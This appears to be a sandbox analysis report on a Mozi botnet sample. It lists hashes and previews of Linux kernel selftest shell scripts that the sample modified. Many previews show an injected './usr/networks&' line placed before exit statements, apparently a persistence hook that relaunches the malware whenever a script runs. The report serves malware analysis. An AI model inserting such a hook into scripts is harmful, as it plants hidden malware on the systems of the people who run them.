                                                              SHA-256:E81E5F5A8C27722A58E154B9493D3F26B954E81C46EC14AD106DEE90A5F42962
                                                              SHA-512:4EDF18741DCB3763602A90980C024DFA6044864AE2BA64742F6F8C4EF8AE39334BFDBE99E6296EDF7EFACFEAADA5F86B499A1FAC9C8C847738F19C908524CFC4
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit $status..fi...set +e..ip link del veth1 2> /dev/null..ip netns del ns1 2> /dev/null..ip netns del ns2 2> /dev/null.}..# Using external program "getopt" to get --long-options.OPTIONS=$(getopt -o hvfi: \. --long verbose,flush,help,interactive,debug,mode: -- "$@").if (( $? != 0 )); then. usage. echo "selftests: $TESTNAME [FAILED] Error calling getopt, unknown option?". exit 2.fi.eval set -- "$OPTIONS"..## --- Parse command line arguments / parameters ---.while true; do..case "$1" in.. -v | --verbose)...export VERBOSE=yes...shift...;;.. -i | --interactive | --debug )...INTERACTIVE=yes...shift...;;.. -f | --flush )...cleanup...shift...;;.. --mode )...shift...XDP_MODE=$1...shift...;;.. -- )...shift...break...;;.. -h | --help )...usage;...echo "selftests: $TESTNAME [SKIP] usage help info requested"...exit 0...;;.. * )...shift...break...;;..esac.done..if [ "$EUID" -ne 0 ]; then..echo "selftests: $TESTNAME [FAILED] need root privileges"..
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):46
                                                              Entropy (8bit):3.925523369006428
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                              MD5:2CADDA792FBD37B54978108B6CC504D4
                                                              SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                              SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                              SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 0../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):995
                                                              Entropy (8bit):4.928718603247161
                                                              Encrypted:false
                                                              SSDEEP:24:aPLPH+uFgWHLTEoozooHFFMF8kL2nfkvUdyXwRx7:aPLPeKgqH3oMoMF8kL2MvUT
                                                              MD5:973C7E7EF2911945AA49402DCFBB1627
                                                              SHA1:DE36D342A11EFF124B62EF56DE2728672F473562
                                                              SHA-256:3B0F9186CC564F480FAAE9E0D192EA887FDFAC05C6036CC776CB0F730D66D381
                                                              SHA-512:AE92957D9E517ACF95DF2F4878A7F8F07ACB9EFB6E7647F9B7D08F68CE895BE0B34424BA16C2F96D5AC04D64D4C133285D00E501171ECFA5082D8B97177E13E0
                                                              Malicious:false
                                                              Preview:./usr/networks&. exit 1.}..setup() {. ip -6 addr add "${V6_INNER}" dev lo || fail 'failed to setup v6 address'. ip -4 addr add "${V4_INNER}" dev lo || fail 'failed to setup v4 address'.. if [[ -n "${V6_SIT}" ]]; then. ip link add "${SIT_DEV_NAME}" type sit remote any local any \.. || fail 'failed to add sit'. ip link set dev "${SIT_DEV_NAME}" up \.. || fail 'failed to bring sit device up'. ip -6 addr add "${V6_SIT}" dev "${SIT_DEV_NAME}" \.. || fail 'failed to setup v6 SIT address'. ip -4 addr add "${V4_SIT}" dev "${SIT_DEV_NAME}" \.. || fail 'failed to setup v4 SIT address'. fi.. sleep 2.# avoid race causing bind to fail.}..cleanup() {. if [[ -n "${V6_SIT}" ]]; then. ip -4 addr del "${V4_SIT}" dev "${SIT_DEV_NAME}". ip -6 addr del "${V6_SIT}" dev "${SIT_DEV_NAME}". ip link del "${SIT_DEV_NAME}". fi.. ip -4 addr del "${V4_INNER}" dev lo. ip -6 addr del "${V6_INNER}" dev lo.}..trap cleanup EXIT..setup."$@".exit "$?"../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):49
                                                              Entropy (8bit):4.073694027700372
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORjusVOORgn:Hn
                                                              MD5:8BB6EDFFB7B315BB004E723523112C7C
                                                              SHA1:28AE6BC189D31C09263C661FE1F657ACC53FA62F
                                                              SHA-256:83D6A5A6B4BA19B9F6783B95D420A9B62DF61A7AC1D1725C0C580422C30BE4F5
                                                              SHA-512:6A410CF23E3B40168C11641FC28440F23A966EB0069A737806885A7E1AB152A3D75CA34EB06E347926EB504842AB28E500AAC0429D3CBFCC9E1785CCF5C8E5AD
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit "$?"../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):5594
                                                              Entropy (8bit):5.230978388733242
                                                              Encrypted:false
                                                              SSDEEP:96:oaS6S51Xx4JG/0gEvJ0C22I5B7TyFn/cH:5SrIG9EvwJ7TyFn/cH
                                                              MD5:472C1D8107D68470FAEE126A96AEF61B
                                                              SHA1:16CED932ABCE5F22426C12309CB1D2610916B167
                                                              SHA-256:0910E28F5BF31A72930DA1F147C0A4343ECE41564566C42A5BCB0C76DA503D67
                                                              SHA-512:CE71ECFAA8194C16FB55B42DECCBD22D53FB5C675E7CCDAE3FE8A6348440C7FE94EE8458AAA8EC7C49D4C95D907B50C0338AC21C6EAA337DA3D6B3F1CA003FD5
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit $ksft_skip..fi...taskset -p 01 $$...SYSFS=`mount -t sysfs | head -1 | awk '{ print $3 }'`...if [ ! -d "$SYSFS" ]; then...echo $msg sysfs is not mounted >&2...exit $ksft_skip..fi...if ! ls $SYSFS/devices/system/cpu/cpu* > /dev/null 2>&1; then...echo $msg cpu hotplug is not supported >&2...exit $ksft_skip..fi...echo "CPU online/offline summary:"..online_cpus=`cat $SYSFS/devices/system/cpu/online`..online_max=${online_cpus##*-}...if [[ "$online_cpus" = "$online_max" ]]; then...echo "$msg: since there is only one cpu: $online_cpus"...exit $ksft_skip..fi...present_cpus=`cat $SYSFS/devices/system/cpu/present`..present_max=${present_cpus##*-}..echo "present_cpus = $present_cpus present_max = $present_max"...echo -e "\t Cpus in online state: $online_cpus"...offline_cpus=`cat $SYSFS/devices/system/cpu/offline`..if [[ "a$offline_cpus" = "a" ]]; then...offline_cpus=0..else...offline_max=${offline_cpus##*-}..fi..echo -e "\t Cpus in offline state: $offline_cpus".}..#.# list a
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1369
                                                              Entropy (8bit):5.048807352649125
                                                              Encrypted:false
                                                              SSDEEP:24:AK62FivFFEh1fmiJTimcQQlUscucGExj8raZgcUP5AgQYSWoNUvaGx:d62F8FEnDUqAvE5cRR9do9+
                                                              MD5:C5A7D35188A9AAF25BEDDA4AEE995EF0
                                                              SHA1:44AE09FB5696C05961433BC5621D3E4A8BC97B97
                                                              SHA-256:15C184F5864838DE83D8876AF2F0852C035CF07B49E350B09A0D2E8D54EF3FB4
                                                              SHA-512:7F329A62D59CB53663D73C72CCE33FD1E8608F5E59A5FA7D55103192D0E14029958378C2FF9A62B38E2A0B254CF3F9F2B9A1321A0B9912F4FC28B83DB4D0A832
                                                              Malicious:false
                                                              Preview:./usr/networks&...printf "No cpu is managed by cpufreq core, exiting\n"...exit;..else...printf "CPUFreq manages: $count CPUs\n\n"..fi...# Detect & print which CPUs are not managed by cpufreq..print_unmanaged_cpus...# read/update all cpufreq files..read_all_cpufreq_files..update_all_cpufreq_files...# hotplug cpus..reboot_cpus 5...# Test all frequencies..shuffle_frequency_for_all_cpus 2...# Test all governors..shuffle_governors_for_all_cpus 1.}..# Suspend/resume.# $1: "suspend" or "hibernate", $2: loop count.do_suspend().{..printf "** Test: Running ${FUNCNAME[0]}: Trying $1 for $2 loops **\n\n"...# Is the directory available..if [ ! -d $SYSFS/power/ -o ! -f $SYSFS/power/state ]; then...printf "$SYSFS/power/state not available\n"...return 1..fi...if [ $1 = "suspend" ]; then...filename="mem"..elif [ $1 = "hibernate" ]; then...filename="disk"..else...printf "$1 is not a valid option\n"...return 1..fi...if [ -n $filename ]; then...present=$(cat $SYSFS/power/state | grep $filename)....if [ -z
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):2675
                                                              Entropy (8bit):5.301400756767313
                                                              Encrypted:false
                                                              SSDEEP:48:iaeuwSaSSnAxaL0nvr1dvQNrFsizYhvrCVSD0tlpPjrtyMC1ddctY2zYYA4Vu:FaS6/CcFX0hWHt7fty1pQAGu
                                                              MD5:BC1F61E4F846CFD9A04893ACCB5CFFA2
                                                              SHA1:8666AB5AC8731768B4624402D642A9C3DC9D7164
                                                              SHA-256:230017DA8F33AC1553156CDA07EF1606DB6486FE975E09440E739B7190103ABE
                                                              SHA-512:FE022DE2F141DAF8F6F52B2EB9F680D0AAAD98A535B0A6F03FACE81A8D9CA027B750E82BCF4C83ADE7848AD4D3B6B915BAEA789D13C39C0BCDFA6F54B0F9ECB2
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 2.}..prerequisite().{..msg="skip all tests:"...if [ $UID != 0 ]; then...echo $msg must be run as root >&2...exit $ksft_skip..fi...taskset -p 01 $$...SYSFS=`mount -t sysfs | head -1 | awk '{ print $3 }'`...if [ ! -d "$SYSFS" ]; then...echo $msg sysfs is not mounted >&2...exit 2..fi...CPUROOT=$SYSFS/devices/system/cpu..CPUFREQROOT="$CPUROOT/cpufreq"...if ! ls $CPUROOT/cpu* > /dev/null 2>&1; then...echo $msg cpus not available in sysfs >&2...exit 2..fi...if ! ls $CPUROOT/cpufreq > /dev/null 2>&1; then...echo $msg cpufreq directory not available in sysfs >&2...exit 2..fi.}..parse_arguments().{..while getopts ht:o:d:g: arg..do...case $arg in....h) # --help.....helpme.....;;.....t) # --func_type (Function to perform: basic, suspend, hibernate, modtest, sptest1/2/3/4 (default: basic)).....FUNC=$OPTARG.....;;.....o) # --output-file (Output file to store dumps).....OUTFILE=$OPTARG.....;;.....d) # --driver-mod-name (Name of the driver module).....DRIVER_MOD=$OPTARG.....;;..
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):4514
                                                              Entropy (8bit):5.01683672738103
                                                              Encrypted:false
                                                              SSDEEP:96:7/VtUWyeZ2qB/Htbuk01FyySFGFilK3NO84rWB/H/U41QekubaVUwWSQH17HE:7//uUHlbu1Pyy2GuK9pxXLQTBSBk
                                                              MD5:91082C2DCE660B751AF54F31756B587B
                                                              SHA1:0DF12E3E0017F6881BA78DF8114647B7BF587E2B
                                                              SHA-256:AB9A80ACB0658F4B232FF4526B865A02283827D07A29C6BFF005454E8688E11B
                                                              SHA-512:ED999C1E074AB50964AE86B8FB554D63D5CD65BC9CB90966DA64E9ABBA62AAA412E0F5439F852FFAB195EB7CFC080B252C6FD0AE966D8CC593400237758EFF1F
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit;..fi...printf "Removing $1 module\n"..# remove module..rmmod $1..if [ $? != 0 ]; then...printf "rmmod $1 failed\n"...exit;..fi...printf "\n".}..# Insert cpufreq driver module and perform basic tests.# $1: cpufreq-driver module to insert.# $2: If we want to play with CPUs (1) or not (0).module_driver_test_single().{..printf "** Test: Running ${FUNCNAME[0]} for driver $1 and cpus_hotplug=$2 **\n\n"...if [ $2 -eq 1 ]; then...# offline all non-boot CPUs...for_each_non_boot_cpu offline_cpu...printf "\n"..fi...# insert module..printf "Inserting $1 module\n\n"..insmod $1..if [ $? != 0 ]; then...printf "Insmod $1 failed\n"...return;..fi...if [ $2 -eq 1 ]; then...# online all non-boot CPUs...for_each_non_boot_cpu online_cpu...printf "\n"..fi...# run basic tests..cpufreq_basic_tests...# remove module..printf "Removing $1 module\n\n"..rmmod $1..if [ $? != 0 ]; then...printf "rmmod $1 failed\n"...return;..fi...# There shouldn't be any cpufreq directories now...for_each_cpu c
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):237
                                                              Entropy (8bit):4.471399431089706
                                                              Encrypted:false
                                                              SSDEEP:3:qXVx7jSHvK3rKCAWRMeFrALlr3rKbVR9MdZe6TykXVwOHYlve6TykXVEQP/NJjUE:a7u26eFUQVHMPHXSOivHXmQPTov6viMn
                                                              MD5:51DF5BDA7024D54AF97186914CAC65A7
                                                              SHA1:13E8E320A2DBDC1991456ECEAF7DDBADEC8781AE
                                                              SHA-256:17CB958D1A6B00FC5878C5E25C7CD90808BCCDCCB8D931402394A1C2E868F2DA
                                                              SHA-512:94BF0CD487FC8B7244E77C147B778B307ABA90FC8DF5FC35C842C4504F8C5D4A28E0C2E3AA367A34C5B0C2D0F1168393E2969F9D91FF42F7F9DFD3DFCB5AAC7C
                                                              Malicious:false
                                                              Preview:./usr/networks&. exit 77.fi..if /sbin/modprobe -q test-drm_mm; then. /sbin/modprobe -q -r test-drm_mm. echo "drivers/gpu/drm_mm: ok".else. echo "drivers/gpu/drm_mm: [FAIL]". exit 1.fi../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):207
                                                              Entropy (8bit):4.921930769285874
                                                              Encrypted:false
                                                              SSDEEP:3:qXVa0vK3rKfKFp6pN+R45GrKbVMlQvQaaTypcp4DaTypc6WP4y6viXVOORgn:YLp8unVMlQYaYqaGYq5WPd6viMn
                                                              MD5:1109E7C1992C5679CF8B73D582594BD6
                                                              SHA1:B36BECD163CDCD51C5D6B31084320BF59A07CB80
                                                              SHA-256:6447FC8B6AF85A486DD97842AF8705412FE7C2E3EEBD529E296A740ACB3A7F33
                                                              SHA-512:FCDD14ADA517AF36EEC9F9B59A905F111A027F4AF550DDBE6474CE9B19AE2868D2E0DE427E8F8328A01CC32AA1815B5E4FEB7967B6F0E1807B3D11135D174394
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 77.fi..if /sbin/modprobe -q i915 mock_selftests=-1; then../sbin/modprobe -q -r i915..echo "drivers/gpu/i915: ok".else..echo "drivers/gpu/i915: [FAIL]"..exit 1.fi../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):124
                                                              Entropy (8bit):4.633778816869914
                                                              Encrypted:false
                                                              SSDEEP:3:qXVxJJERGENOFGEwnk9bJjWXVOORgn:aJaGENOddxJjWMn
                                                              MD5:24F391D61563226193252A631BC07048
                                                              SHA1:239A891EA619047A812CF830B7EA49AE982D99AF
                                                              SHA-256:BD78E640A265961860A4189D50EE60C48B02BE882C07193DAAA34001189668A3
                                                              SHA-512:FF531B342B1C672C44B5EE4F7C34FF95BCF8DBB1C2637A4AF68AD1A07A651A848864AD7B0713E8F00B8B4A278A8988F38B94E7036EC8893E1524CA541E6857E1
                                                              Malicious:false
                                                              Preview:./usr/networks&. exit.fi..tcflags="skip_hw".test_sw..tcflags="skip_sw".test_hw..exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
